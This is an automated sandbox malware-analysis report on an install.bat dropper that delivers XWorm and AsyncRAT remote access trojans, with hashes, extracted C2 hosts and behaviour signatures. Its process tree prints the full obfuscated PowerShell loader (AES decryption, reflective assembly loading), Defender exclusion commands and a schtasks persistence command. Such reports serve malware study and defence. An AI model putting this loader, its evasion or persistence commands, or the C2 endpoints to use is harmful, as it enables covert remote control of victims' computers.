Analysis

  • max time kernel
    40s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-07-2024 15:22

Errors

Reason
Machine shutdown

General

  • Target

    install.bat

  • Size

    192KB

  • MD5

    a94e4dec22b09ea37e33fdfa3638e5de

  • SHA1

    f90c1ea98c741bc63a3260721d1974962b9241ce

  • SHA256

    bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4

  • SHA512

    a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b

  • SSDEEP

    3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c

Malware Config

Extracted

Family

xworm

C2

unique-emotions.gl.at.ply.gg:54742

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

card-buzz.gl.at.ply.gg:2497

Mutex

rotrzgmheqhT

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\install.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\install.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2208
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Users\Admin\AppData\Local\Temp\Update.exe
          "C:\Users\Admin\AppData\Local\Temp\Update.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1104
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4700
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3252
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2292
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4956
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3468

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      217d9191dfd67252cef23229676c9eda

      SHA1

      80d940b01c28e3933b9d68b3e567adc2bac1289f

      SHA256

      e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

      SHA512

      86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

    • C:\Users\Admin\AppData\Local\Temp\Update.exe

      Filesize

      59KB

      MD5

      07ac8571846ca0cc9f6fcdbe1d000be2

      SHA1

      3cbe16f7d24d40b590f97b1999c64c5bb889e8c6

      SHA256

      2a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5

      SHA512

      56413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecghvhzb.22j.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1104-40-0x00007FFE3D433000-0x00007FFE3D435000-memory.dmp

      Filesize

      8KB

    • memory/1104-95-0x000000001B760000-0x000000001B772000-memory.dmp

      Filesize

      72KB

    • memory/1104-94-0x00007FFE3D430000-0x00007FFE3DEF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1104-93-0x00007FFE3D433000-0x00007FFE3D435000-memory.dmp

      Filesize

      8KB

    • memory/1104-85-0x000000001DAB0000-0x000000001DABE000-memory.dmp

      Filesize

      56KB

    • memory/1104-84-0x00007FFE3D430000-0x00007FFE3DEF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1104-39-0x0000000000B50000-0x0000000000B66000-memory.dmp

      Filesize

      88KB

    • memory/4700-41-0x000001B3789E0000-0x000001B378A02000-memory.dmp

      Filesize

      136KB

    • memory/4992-20-0x0000000006D60000-0x0000000006DA4000-memory.dmp

      Filesize

      272KB

    • memory/4992-2-0x0000000074F60000-0x0000000075710000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-23-0x0000000006F90000-0x0000000006FAA000-memory.dmp

      Filesize

      104KB

    • memory/4992-24-0x00000000070A0000-0x00000000070A8000-memory.dmp

      Filesize

      32KB

    • memory/4992-25-0x0000000007110000-0x000000000713C000-memory.dmp

      Filesize

      176KB

    • memory/4992-28-0x00000000070C0000-0x00000000070D2000-memory.dmp

      Filesize

      72KB

    • memory/4992-4-0x0000000074F60000-0x0000000075710000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-21-0x0000000006EF0000-0x0000000006F66000-memory.dmp

      Filesize

      472KB

    • memory/4992-5-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

      Filesize

      136KB

    • memory/4992-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

      Filesize

      304KB

    • memory/4992-3-0x0000000004DE0000-0x0000000005408000-memory.dmp

      Filesize

      6.2MB

    • memory/4992-22-0x00000000075F0000-0x0000000007C6A000-memory.dmp

      Filesize

      6.5MB

    • memory/4992-18-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

      Filesize

      120KB

    • memory/4992-13-0x0000000005560000-0x00000000058B4000-memory.dmp

      Filesize

      3.3MB

    • memory/4992-86-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

      Filesize

      4KB

    • memory/4992-88-0x0000000074F60000-0x0000000075710000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-91-0x0000000074F60000-0x0000000075710000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-0-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

      Filesize

      4KB

    • memory/4992-7-0x00000000054F0000-0x0000000005556000-memory.dmp

      Filesize

      408KB

    • memory/4992-6-0x0000000005480000-0x00000000054E6000-memory.dmp

      Filesize

      408KB

    • memory/4992-1-0x0000000002690000-0x00000000026C6000-memory.dmp

      Filesize

      216KB